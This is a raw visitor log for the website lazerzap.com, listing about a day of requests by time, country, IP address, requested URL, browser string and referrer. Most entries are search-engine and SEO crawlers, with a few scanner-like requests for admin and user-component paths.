lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 13:00 China 14.215.176.7 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=excitementiyg Jul 11 - 13:04 China 123.125.143.31 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=trackmpn Jul 11 - 13:15 45.33.248.208 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 11 - 13:15 45.33.248.208 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 11 - 13:38 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 14:11 China 223.104.170.35 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] iPhone Unknown Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 https://m.baidu.com/from=844b/bd_page_type=1/ssid=5fe06c616e78696e5f31303231ff39/uid=0/pu=usm%401%2Csz%401320_2001%2Cta%40iphone_1_11.4_3_605/baiduid=F5FAEA9D0F57175E9D85B27B21E1B6C0/w=0_10_/t=iphone/l=3/tc?ref=www_iphone&lid=10821150329829326840&order=1&fm=alop&tj=www_normal_1_0_10_title&vit=osres&m=8&srd=1&cltj=cloud_title&asres=1&title=Lazerzap.com-INFPTopsites%2COfficialLazerzap...&dict=32&wd=&eqid=962c72e45e940000100000065b458a77&w_qd=IlPT2AEptyoA_yiNHVmcCWEivhK&tcplug=1&sec=31156&di=b8b7687c818f000f&bdenc=1&tch=124.1134.43.282.2.1762&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IGhO0MDx31yb5nk_qva02&clk_info=%7B%22srcid%22%3A1599%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1531284108693%2C%22xpath%22%3A%22div-a-h3-em%22%7D&sfOpen=1 Jul 11 - 14:12 United States 54.36.148.196 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 14:27 China 123.125.71.114 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Linux Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 11 - 14:59 China 42.236.50.225 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 11 - 15:27 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 15:49 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 11 - 16:19 China 14.215.176.136 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=pencili1i Jul 11 - 16:37 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 16:59 United States 66.249.66.79 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 17:02 United States 66.249.66.79 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 17:23 United States 54.36.149.69 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 17:33 United States 107.21.1.8 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com) http://lazerzap.com/ Jul 11 - 17:51 Romania 109.102.111.92 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.8.0_141 No Referrer Jul 11 - 17:51 Romania 109.102.111.92 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.8.0_141 No Referrer Jul 11 - 18:00 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 18:10 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 11 - 18:35 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 11 - 18:38 United States 74.208.216.211 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0 No Referrer Jul 11 - 18:38 United States 74.208.216.211 http://lazerzap.com/?author=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0 No Referrer Jul 11 - 18:44 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 18:54 United States 66.249.66.79 http://lazerzap.com/index.php/+/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 18:54 United States 66.249.66.79 http://lazerzap.com/index.php/+/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 http://lazerzap.com/index.php/+/ts_files/randomimages.php Jul 11 - 19:14 United States 54.36.148.97 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 19:17 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 19:39 Netherlands 46.229.168.71 http://lazerzap.com/index.php/shop/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 11 - 19:53 China 39.71.3.174 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.42 Safari/537.36 https://www.google.com/ Jul 11 - 20:05 United States 66.249.66.80 http://lazerzap.com/index.php/trackback/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 20:06 United States 66.249.66.80 http://lazerzap.com/index.php/trackback/ts_files/scroll.js lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 http://lazerzap.com/index.php/trackback/visitor_data.html Jul 11 - 20:06 United States 66.249.66.79 http://lazerzap.com/index.php/trackback/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 http://lazerzap.com/index.php/trackback/visitor_data.html Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/ Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/ Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 20:12 Belarus 80.249.91.104 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 20:36 United States 54.36.148.102 http://lazerzap.com/index.php/component/users/ts_files/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 20:38 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 11 - 21:02 United States 66.249.92.142 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown AdsBot-Google (+http://www.google.com/adsbot.html) No Referrer Jul 11 - 21:06 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 21:33 United States 216.244.66.241 http://www.lazerzap.com/index.php/mber/ts_files/ts_files/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 11 - 21:59 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 11 - 22:15 Netherlands 46.229.168.84 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 11 - 23:03 United States 75.84.140.122 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36 http://lazerzap.com/ Jul 11 - 23:06 China 180.76.15.162 http://www.lazerzap.com/index.php/+/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 11 - 23:10 United States 70.42.131.170 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 8 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) No Referrer Jul 11 - 23:18 United States 54.36.148.195 http://lazerzap.com/index.php/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 23:51 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 00:03 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 00:10 Netherlands 46.229.168.72 http://lazerzap.com/index.php/admininstrator/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 11 - 00:16 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 11 - 00:24 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 00:45 Argentina 190.185.178.2 http://lazerzap.com/index.php/trackback/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown PHP/5.2.71 http://www.office-ackermann.com/cgi-std/gaestebuch.cgi Jul 11 - 01:03 United States 54.36.148.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 01:05 Germany 137.226.113.28 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 zgrab/0.x (compatible; Researchscan/t13rl; +http://researchscan.comsys.rwth-aachen.de) No Referrer Jul 11 - 01:09 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 01:28 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 02:04 United States 54.36.148.72 http://lazerzap.com/index.php/+/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 02:40 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 02:40 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 02:43 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 02:45 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 02:56 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 03:08 United States 216.244.66.241 http://www.lazerzap.com/index.php/mber/ts_files/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 11 - 03:46 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 04:10 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 04:23 Russian Federation 92.101.242.17 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 YaBrowser/17.10.0.2017 Yowser/2.5 Safari/537.36 http://lazerzap.com/index.php/component/users/ Jul 11 - 04:23 Russian Federation 92.101.242.17 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 YaBrowser/17.10.0.2017 Yowser/2.5 Safari/537.36 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 04:23 Russian Federation 92.101.242.17 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 YaBrowser/17.10.0.2017 Yowser/2.5 Safari/537.36 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 11 - 04:43 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 04:45 Russian Federation 46.161.9.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 http://lazerzap.com/ Jul 11 - 04:46 China 14.215.176.17 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=correctlyrss Jul 11 - 05:04 China 121.228.62.205 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£© http://www.topidea2000.com/ Jul 11 - 05:19 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 05:21 China 180.76.15.16 http://www.lazerzap.com/?q=login.destroy.session&r=0.01231231230 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 11 - 06:35 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 06:50 United States 66.249.66.78 http://lazerzap.com/index.php?m=admin lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 06:50 United States 207.46.13.96 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 11 - 06:56 United States 54.36.148.51 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 06:58 United States 54.36.148.56 http://lazerzap.com/index.php/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 11 - 07:10 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 08:03 China 180.76.15.158 http://www.lazerzap.com/index.php/component/users/ts_files/ts_files/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 11 - 08:37 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 08:42 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 11 - 08:57 United States 54.224.216.155 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown CCBot/2.0 (http://commoncrawl.org/faq/) No Referrer Jul 11 - 08:59 China 180.76.15.27 http://www.lazerzap.com/index.php/+/ts_files/ts_files/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 11 - 09:14 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 09:31 United States 54.157.145.136 http://lazerzap.com/index.php 